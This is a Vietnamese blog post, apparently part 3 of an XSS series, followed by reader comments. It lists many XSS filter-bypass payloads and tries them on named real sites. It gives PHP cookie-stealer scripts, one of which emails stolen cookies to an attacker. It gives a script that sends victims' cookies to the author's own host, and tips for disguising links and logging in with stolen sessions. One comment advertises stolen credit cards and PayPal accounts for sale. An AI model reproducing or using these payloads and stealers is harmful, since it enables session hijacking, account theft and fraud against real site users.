Thứ Ba, 12 tháng 3, 2013

[Bài 3 - XSS] Kỹ thuật Bypass và phương pháp tấn công XSS

                       

               Trong bài trước Giới thiệu chung về XSS Soleil đã giới thiệu qua về cách kiểm tra, xác định 1 site dính XSS và một số thao thác thực thi trên sites bị dính lỗi . Trong bài này Soleil sẽ đề cập đến các kỹ thuật bypass và quá trình thực hiện 1 cuốc tấn công bằng XSS

     7.       Kỹ Thuật Bypass

                1 số site dính XSS không thể tấn công bằng những đoạn mã đơn giản, giải pháp nghĩ đến đó là phải bypass bộ lọc. Có một số dạng bypass đoạn mã script như sau:


       "><script>alert("Check By Soleil")</script>
"><script>alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108)) </script>
'><script>alert("Check By Soleil ")</script>
'><script>alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108))</script>
     <ScRIPt>aLeRT("Check By Soleil ")</ScRIPt>
<ScRIPt<aLeRT(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108))</ScRIPt>
"><ScRIPt>aLeRT("Check By Soleil ")</ScRIPt>
"><ScRIPt<aLeRT(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108)) </ScRIPt>
'><ScRIPt>aLeRT("Check By Soleil ")</ScRIPt>
'><ScRIPt<aLeRT(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108))</ScRIPt>
</script><script>alert("Check By Soleil ")</script>
</script><script>alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108) )</script>
"/><script>alert("Check By Soleil ")</script>
"/><script>alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108))</script>
'/><script>alert("Check By Soleil ")</script>
'/><script>alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108))</script>
</SCRIPT>"><SCRIPT>alert("Check By Soleil ")</SCRIPT>
</SCRIPT>"><SCRIPT>alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108))
</SCRIPT>">"><SCRIPT>alert("Check By Soleil ")</SCRIPT>
</SCRIPT>">'><SCRIPT>alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108))</SCRIPT>
</SCRIPT>">'<SCRIPT>alert(String.fromCharCode(67,104,101,99,107,32,66,121,32,83,111,108,101,105,108,45,86,72,66,32,89,104,58,100,117,99,100,117,110,103,46,48,56,99,108,99 ))</SCRIPT>
";alert("Check By Soleil ");"
";alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108));"
';alert("Check By Soleil ");'
';alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108));'
";alert("Check By Soleil ")
";alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108)) ';alert("Check By Soleil ")
';alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108))

           Trong đó: 67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108 chính là chuỗi string “ Check By Soleil” ở dạng char.

       Ví dụ:

    -          Attacker có thể chèn vào thanh tìm kiếm site http://www.hanoi.gov.vn    đoạn mã script đã bypass sau:
<SCRIPT>alert(String.fromCharCode(67,104,101,99,107,32,66,121,32,83,111,108,101,105,108,45,86,72,66,32,89,104,58,100,117,99,100,117,110,103,46,48,56,99,108,99 ))</SCRIPT>
      Từ đó xác định site này đã chính lỗ hổng XSS và sẽ tìm cách để khai thác, chiếm quyền điều khiển đối với site này.




- http://m.aol.com/yp/search?query=Bars"><script>alert(/Check By Mr.Soleil VHB_Group/)</script>


http://tuoitre.vn/Tim-kiem/?page=1&keyword=%3C/script%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2867,104,101,99,107,32,66,121,32,83,111,108,101,105,108,45,86,72,66,32,89,104,58,100,117,99,100,117,110,103,46,48,56,99,108,99%20%29%29%3C/SCRIPT%3E


      8.      Quá trình các bước thực hiện tấn công bằng XSS


       Bước 1: Tạo file Stealer.php để đánh cắp cookies

Nội dung của file Stealer.php như sau:

        <?php
       $cookie = $HTTP_GET_VARS["cookie"];
$steal = fopen("logs.txt", "a");
fwrite($steal, $cookie ."\\n");
fclose($steal);
?>

-      $cookie = $HTTP_GET_VARS["cookie"];   // đánh cắp cookie từ địa chỉ hiện   tại url(stealer.php?cookie=x) và lưu trữ cookie trong biến  $cookie
-          $steal = fopen("cookiefile.txt", "a");   // Mở cookiefile để đính kèm các cookie được đánh cắp
-          fwrite($steal, $cookie ."\\n");  // Lưu lại những cookie được đánh cắp bên trong file
-          fclose($steal);  // Đóng lại cookiefile

     File này có nhiệm vụ đánh cắp cookies của victim và ghi thông tin lên file logs.txt

      Bước 2: Up các file lên host

UP lên host 2 file Stealer.php và logs.txt. Trong đó file Stealer.php có nội dung như trên và file logs.txt là file rỗng để lưu trữ toàn bộ thông tin của victim được gửi về thông qua mệnh lệnh được đưa ra từ file Stealer.php.
      Lưu ý, phải chmod file log.txt  về 777.
      Ngoài ra có thể sử dụng các đoạn mã sau  có thêm nhiều nhiệm vụ hơn cho file stealer.php


<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");;
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cookies.html', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Referer: '.$referer.'<br><br><br>');
fclose($fp);
header ("Location: <ENTER WEBSITE HERE>");
?>


<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");;
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cookies.html', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Referer: '.$referer.'<br><br><br>');
fclose($fp);
?>

<?php
$cookie = $HTTP_GET_VARS["cookie"]; 
mail("ducdung.08clc@gmail.com", "Stolen Cookies", $cookie);
?>
// Đoạn mã này có tác dụng gửi cookies về email của attacker


       Bước 3: Khai thác lỗ hổng XSS

      -          Giả sử soleil up 2 file trên lên host của site http://www.vhbgroup.net , thì đoạn mã script ăn cắp cookies có dạng như sau:

     <script>location.href  =  'http://www.vhbgroup.net/Stealer.php?cookie='+document.cookie;</script>

     -          Chèn đoạn mã đó vào site dính lỗi XSS là http://www.VulnerableSite.com ta được link tương tự như:

       http://www.VulnerableSite.com/index.php?search=<script>location.href='http://www.vhbgroup.net/Stealer.php?cookie='+document.cookie;</script>

     -          Hoặc là chèn đoạn mã sau vào khung search, comment hay textbox nào đó, khi victim view site thì cookies sẽ được gửi về cho attacker <script>location.href='http://www.vhbgroup.net/Stealer.php?cookie='+document.cookie;</script>

       Để đánh lừa được victim thì attacker sẽ làm ngắn đoạn url trên bằng cách sử dụng 1 số link sau:
https://addons.mozilla.org/vi/firefox/addon/copy-shorturl/       

       Sau khi đã đánh cắp đươc thông tin cookies của victim, có thể sử dụng tiên ích add-ons cookies manager  hoặc live http để login.

6 nhận xét:

DUNG nói...

Dork XSS: http://www.ziddu.com/download/16913106/XSSDorks.txt.html

DUNG nói...

http://google.nyu.edu/search?q=%22%3E%3Cscript%3Ealert%28%22Check+By+Mr.Soleil+VHB_Group%22%29%3C%2Fscript%3E+&btnG=Search&site=NYUWeb_Main&client=NYUWeb_Main&output=xml_no_dtd&proxyreload=1&proxystylesheet=stern_frontend&sitesearch=www.stern.nyu.edu&ie=UTF-8&sort=date%3AD%3AL%3Ad1&entqr=0&entqrm=0&entsp=a__NYUWeb_Main_bias_policy&oe=UTF-8&ud=1

Nặc danh nói...

thanks bạn rất nhiều
truyen sex | phim sex | truyen nguoi lon | truyen sex moi | phim sex moi | phim | xem phim | phim sex

whoiam9x nói...

Làm sao để up 2 file trên lên host một web?

Unknown nói...

hay lam anh

Kòÿÿ nói...

Bán CC, Gift Card, Stock 5, Ship, Ads Facebook,Key phần mềm
==== Credit Card ====
- Us (Visa,Master) = 5$ per 1 ( >100cc = 1$/CC)
- Us (Amex,Dis) = 7$ per 1 ( >100cc = 2$/CC)
CC is Checked, nếu cc bị die bảo hành 1 - 1 trong vòng 24h kể từ lúc bạn payment
Tặng 1 Stock US cho bạn nào mua CC
==== Gift Card ====
Selling Amazon Gift Card all balancer (35%)
Selling ITunes Gift Card (45%)
Seliing Ebay , Mayc , BestBuy , Newget Egift Card (40%)
==== Paypal ====
Paypal Veritified with balance 3000$ = 300$
Paypal Veritified with balance 5000$ = 500$
Paypal Veritified with balance 7000$ = 800$
Paypal Veritified with balance 15000$= 1000$
==== Stock v5 ====
- Stock Live US,UK,CA,AU,EU,... 20$/100 days
==== Account Google Drive Unlimited
- 50$/account/10 năm
==== Key Phần mềm, bản quyền, lech file envato, acc vip,...
Liên hệ để có giá chi tiết
Lech file evato product design,Kis,Windows 10/7/8, IDM,..
==== Shipped, Drop, Direct. Ship Iphone, ipad, ebay và amzon
Ship direct (trực tiếp) Viet Nam 2-3 ngày có tracking number (35%)
Ship + Drop 3 - 7 ngày có tracking EMS (60%)
==== TUT Run ADS FACEBOOK With CVV ====
Chạy quảng cáo ads facebook chùa (Free) - Không block page
**View more: http://notepad.cc/share/N7zCviwrIM
===> Contact tôi (24/7) <===
Yahoo: HKT.KT823@Yahoo.com
Gmail: HKT.KT8@gmail.com
ICQ: 651262920

Đăng nhận xét